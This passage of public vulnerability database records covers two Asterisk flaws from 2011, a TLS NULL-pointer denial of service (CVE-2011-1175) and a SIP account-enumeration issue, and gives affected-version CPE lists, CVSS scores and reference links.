              "matchCriteriaId": "A67D156B-9C43-444F-ADEC-B21D99D1433C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "893EB152-6444-43DB-8714-9735354C873A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8447EE7-A834-41D7-9204-07BD3752870C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C04F2C9-5672-42F2-B664-A3EE4C954C29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "33465668-4C91-4619-960A-D26D77853E53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CAD08674-0B44-44EA-940B-6812E2D5077D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEE87710-A129-43AA-BA08-8001848975FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F582C6E-5DA0-4D72-A40E-66BDBC5CF2B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E7CEBB8-01B3-4A05-AFE8-37A143C9833E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2FAC47DD-B613-43E4-B9BF-6120B81D9789",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "86D20CB5-60E8-405E-B387-CF80C7DA5E07",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "71AB5A01-5961-4053-9111-CF32C6473A00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "77D8E1DC-041F-4B87-AF9A-E0EC4D6A4BD8",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "tcptls.c in the TCP/TLS server in Asterisk Open Source 1.6.1.x before 1.6.1.23, 1.6.2.x before 1.6.2.17.1, and 1.8.x before 1.8.3.1 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) by establishing many short TCP sessions to services that use a certain TLS API."
    },
    {
      "lang": "es",
      "value": "tcptls.c en el servidor TCP/TLS en Asterisk Open Source v1.6.1.x  anterior a v1.6.1.23, v1.6.2.x anterior a v1.6.2.17.1, y v1.8.x anterior a v1.8.3.1 permite a atacantes remotos causar una denegaci\u00f3n de servicio (desreferencia a un puntero NUL) mediante el establecimiento de muchas sesiones TCP cortas   a los servicios que utilizan una cierta API de TLS."
    }
  ],
  "evaluatorComment": "Per: http://cwe.mitre.org/data/definitions/476.html\r\n\u0027CWE-476: NULL Pointer Dereference\u0027",
  "id": "CVE-2011-1175",
  "lastModified": "2024-11-21T01:25:43.370",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2011-03-31T22:55:03.223",
  "references": [
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-004.html"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Patch"
      ],
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/056945.html"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057156.html"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057163.html"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://openwall.com/lists/oss-security/2011/03/17/5"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Patch"
      ],
      "url": "http://openwall.com/lists/oss-security/2011/03/21/12"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://securitytracker.com/id?1025224"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://www.debian.org/security/2011/dsa-2225"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://www.securityfocus.com/bid/46898"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2011/0686"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2011/0790"
    },
    {
      "source": "secalert@redhat.com",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=688678"
    },
    {
      "source": "secalert@redhat.com",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/66140"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-004.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/056945.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057156.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/057163.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://openwall.com/lists/oss-security/2011/03/17/5"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://openwall.com/lists/oss-security/2011/03/21/12"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securitytracker.com/id?1025224"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2011/dsa-2225"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/46898"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2011/0686"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2011/0790"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=688678"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/66140"
    }
  ],
  "sourceIdentifier": "secalert@redhat.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2011-07-06 19:55

Modified

2024-11-21 01:28

Severity ?

Summary

The default configuration of the SIP channel driver in Asterisk Open Source 1.4.x through 1.4.41.2 and 1.6.2.x through 1.6.2.18.2 does not enable the alwaysauthreject option, which allows remote attackers to enumerate account names by making a series of invalid SIP requests and observing the differences in the responses for different usernames, a different vulnerability than CVE-2011-2536.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2011-011.html	Vendor Advisory
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/68472
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2011-011.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/68472

Impacted products

Vendor	Product	Version
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.1
digium	asterisk	1.6.2.1
digium	asterisk	1.6.2.2
digium	asterisk	1.6.2.3
digium	asterisk	1.6.2.4
digium	asterisk	1.6.2.5
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.15
digium	asterisk	1.6.2.16
digium	asterisk	1.6.2.16
digium	asterisk	1.6.2.16.1
digium	asterisk	1.6.2.16.2
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17.1
digium	asterisk	1.6.2.17.2
digium	asterisk	1.6.2.17.3
digium	asterisk	1.6.2.18
digium	asterisk	1.6.2.18
digium	asterisk	1.6.2.18.1
digium	asterisk	1.6.2.18.2
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.0
digium	asterisk	1.4.1
digium	asterisk	1.4.2
digium	asterisk	1.4.3
digium	asterisk	1.4.4
digium	asterisk	1.4.5
digium	asterisk	1.4.6
digium	asterisk	1.4.7
digium	asterisk	1.4.7.1
digium	asterisk	1.4.8
digium	asterisk	1.4.9
digium	asterisk	1.4.10
digium	asterisk	1.4.10.1
digium	asterisk	1.4.11
digium	asterisk	1.4.12
digium	asterisk	1.4.12.1
digium	asterisk	1.4.13
digium	asterisk	1.4.14
digium	asterisk	1.4.15
digium	asterisk	1.4.16
digium	asterisk	1.4.16.1
digium	asterisk	1.4.16.2
digium	asterisk	1.4.17
digium	asterisk	1.4.18
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19
digium	asterisk	1.4.19.1
digium	asterisk	1.4.19.2
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20
digium	asterisk	1.4.20.1
digium	asterisk	1.4.21
digium	asterisk	1.4.21
digium	asterisk	1.4.21
digium	asterisk	1.4.21.1
digium	asterisk	1.4.21.2
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22
digium	asterisk	1.4.22.1
digium	asterisk	1.4.22.2
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23
digium	asterisk	1.4.23.1
digium	asterisk	1.4.23.2
digium	asterisk	1.4.24
digium	asterisk	1.4.24
digium	asterisk	1.4.24.1
digium	asterisk	1.4.25
digium	asterisk	1.4.25
digium	asterisk	1.4.25.1
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26
digium	asterisk	1.4.26.1
digium	asterisk	1.4.26.2
digium	asterisk	1.4.26.3
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27
digium	asterisk	1.4.27.1
digium	asterisk	1.4.28
digium	asterisk	1.4.28
digium	asterisk	1.4.29
digium	asterisk	1.4.29
digium	asterisk	1.4.29.1
digium	asterisk	1.4.30
digium	asterisk	1.4.30
digium	asterisk	1.4.30
digium	asterisk	1.4.31
digium	asterisk	1.4.31
digium	asterisk	1.4.31
digium	asterisk	1.4.32
digium	asterisk	1.4.32
digium	asterisk	1.4.33
digium	asterisk	1.4.33
digium	asterisk	1.4.33
digium	asterisk	1.4.33.1
digium	asterisk	1.4.34
digium	asterisk	1.4.34
digium	asterisk	1.4.34
digium	asterisk	1.4.35
digium	asterisk	1.4.35
digium	asterisk	1.4.36
digium	asterisk	1.4.36
digium	asterisk	1.4.37
digium	asterisk	1.4.37
digium	asterisk	1.4.38
digium	asterisk	1.4.38
digium	asterisk	1.4.39
digium	asterisk	1.4.39
digium	asterisk	1.4.39.1
digium	asterisk	1.4.39.2
digium	asterisk	1.4.40
digium	asterisk	1.4.40
digium	asterisk	1.4.40
digium	asterisk	1.4.40
digium	asterisk	1.4.40.1
digium	asterisk	1.4.40.2
digium	asterisk	1.4.41
digium	asterisk	1.4.41
digium	asterisk	1.4.41.1
digium	asterisk	1.4.41.2

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F8B700A-FACB-4BC8-9DF2-972DC63D852B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "FFD31B9B-2F43-4637-BE56-47A807384BF3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "E6450D6B-C907-49E6-9788-E4029C09285F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "DDB0432E-024A-4C0C-87FF-448E513D2834",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "D6A6A343-FEA2-49E5-9858-455AE3B29470",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "D57B94E3-EA37-466C-ADC4-5180D4502FDD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc7:*:*:*:*:*:*",
              "matchCriteriaId": "64D35A89-6B21-4770-AA0F-424C5C91A254",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc8:*:*:*:*:*:*",
              "matchCriteriaId": "14817302-A34A-4980-B148-AEB4B3B49BE3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "61FDFA96-E62A-413B-9846-F51F1F7349EC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DA924386-49F6-4371-B975-B1473EEA12F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B74A1B99-8901-4690-B994-1DAD3EFA5ABB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4253C7DD-3588-4B35-B96D-C027133BE93F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "24AE11DB-16D3-42BF-BC64-E8982107D35B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "53841D77-926C-4362-BC85-BD8B6AC4391D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "F98FD6E6-EDE9-437D-B7C2-2DB65B73D230",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "4BA6CA77-D358-4623-8400-78EFC47ADB7C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B4E62DAB-45E0-4EAA-8E45-6D3757A679D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.15:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1355578C-B384-401A-9123-2789CBECAD0B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "3491F8DB-A162-4608-B5F9-5401FE058CEB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C52730A8-D96E-46C1-8905-1D78A93E9C84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C6E5CD17-B14A-4BDB-BA75-261344FF6F25",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "63C8DBF5-6992-4618-BD2D-56F1F98EAE3C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEED6C07-CFB7-44DC-9A41-9B6271942123",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0864DAF9-B7FA-4018-99F4-F2A7AA6FBBB0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "694B257B-E73B-4534-B316-87284FA45534",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "418FD91F-014E-4529-8D72-D3FB27788EEA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "D213EC93-0D4F-4BD9-9F13-9A9E705135EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E9D2091-B292-4D6E-A91F-58D24BD5A5E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "CFF196A0-87E1-4DD2-8CDA-B19EB6F71312",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F59B7C5-8EF3-495E-9A91-9C96E6DF41E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.18:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D9020FF4-645B-4E98-8CB0-3F8DF7C5841B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.18.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "9FA6B65B-1D93-4028-BD85-8879D310B896",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.18.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "79A46D43-FE29-4665-8052-284BC9C70D9E",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E56DB29-571D-4615-B347-38CF4590E463",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "FC1188DA-6C27-48D2-9CE7-74D77B24EE9E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "A93B8F91-5C56-44DE-AE29-8468E853759F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "BF7F4D02-7C8E-403C-A53E-A5F8C07F33A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "D85031A3-3444-4650-905D-721F1EBAA24F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F0AC2B3-6E8A-4B26-8A6C-792D9E5072C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2BC8D6D4-A389-4A78-8DA8-351A9CB896E0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E979AC4-58EA-4297-9F90-350924BBE440",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "3A58CCD3-4A0C-468B-85F2-59A52B7293A4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "3542DB91-8487-49D6-AA15-E8FD9D6B99D6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "6BA4F3F1-C3F1-4E15-A854-9BB84E33E4AB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "661D710E-79F0-4E98-B35B-ED0549D35C24",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "68291ADE-F9D1-427B-B150-FDA7F2F4788B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "7F80CBCB-F58D-4BE7-8E78-67E04C900D01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "EB61D32E-3400-480E-BD27-BA3F98F94427",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "D9154EDB-CAE6-4BB0-8D02-9EC2B81D93C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A432B0A7-F158-4B9C-97F6-6A29DB13EAFA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "687C67CB-46AF-40C2-8A02-081C7F78568A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E8D6EC0-A61E-4DBC-A0C7-864E9C4BDA1A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "2EF7F65A-45FD-4586-901E-49B057100BB4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "300F158E-ED27-46C8-85E4-AA0AA6B201DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB6F04C0-3226-4D2C-97A3-39999483C62C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "30685A20-963A-48D4-B7D7-2C11C2C812AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "C54C3AAC-4D5D-4661-86AB-6849982E8C67",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F847916-89F1-4AA6-973D-6002C8B54EE8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "5359815E-671A-4DFD-9E99-8CF903A03C84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "E2EFBC9E-4DCA-43CB-93EB-6807E2383A98",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "98755B1B-CAD5-4AC5-8571-52E67C3A8274",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:*:*:*:*:*:*:*",
              "matchCriteriaId": "C9D8C8FE-3D09-4F60-AD03-9D4439942141",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "902FBE4B-5237-43CD-8EB6-D2CAC0F30879",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "708DCACA-49EC-468D-81EC-CE5367F8A164",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "BA9E3314-7D23-414C-8187-16D807410B62",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D824ED7B-BAB6-4C0F-A6B0-A75AB072EC0F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7A01CE63-F834-48B2-826D-2DAD1B4AE8C3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "88B9CC9D-3DC2-4674-BA52-4C6D4E2056C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:*:*:*:*:*:*:*",
              "matchCriteriaId": "43F1849F-1230-45E7-B6A3-D6FC72EB0F11",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "873C9C7E-93A3-4269-B19C-AB33A21C1AC7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "457F2112-7C5E-4953-8F4C-117925D486DA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "BD15ADD6-D7FA-441A-A9BC-487BCC15F2A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "792A8901-B7B8-40E8-9258-6338B72770FD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:*:*:*:*:*:*:*",
              "matchCriteriaId": "0E6C8F78-0C00-45A5-8FEB-2A4BD5AC1A37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F3E04247-C4EF-4C1B-B879-5C02986950D3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "5E382FC8-4001-4058-9151-05AE98B4A35E",
              "vulnerable": true
            },
            {
